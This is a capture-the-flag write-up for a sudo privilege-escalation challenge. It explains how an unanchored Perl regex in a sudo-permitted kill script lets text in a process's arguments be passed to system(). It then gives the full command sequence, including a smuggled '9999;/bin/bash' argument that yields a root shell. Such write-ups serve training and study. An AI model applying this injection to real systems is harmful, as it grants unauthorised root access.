Challenge 18: License to Kill

Level: Hard Sudo Rule: localuser18 ALL=(ALL) NOPASSWD: /usr/local/bin/admin_task.sh, /usr/local/bin/kill_admin.pl

Notes: The kill_admin.pl script uses an overly broad, and frankly unnecessary, perl regular expression to locate a process id from the output of the ps command here:

/(\d.*)\s+pts\/\d+\s+.+\s+\d+:\d+\s+\/bin\/sh\s+\/usr\/local\/bin\/admin_task.sh/

That (\d.*)\s+ doesn't require that it's at the start of a line with the ^ anchor, and will match anything after a number, including our arbitrary commands that are executed here:

            	system("/bin/kill $1");

We can supply the necessary input by running a shell script that sleeps with the correct argv. You could even do it with the kill_admin.pl script itself, since the sudo rule allows for any argv, and the script doesn't use it.

Solution:

sudo -l
cat /usr/local/bin/admin_task.sh
cat /usr/local/bin/kill_admin.pl

echo '9999;/bin/bash pts/1 S 1:1 /bin/sh /usr/local/bin/admin_task.sh'

cat > script.sh <<EOF
#!/bin/bash
sleep 60
EOF

chmod +x script.sh

./script.sh '9999;/bin/bash pts/1 S 1:1 /bin/sh /usr/local/bin/admin_task.sh' &
sudo /usr/local/bin/kill_admin.pl
id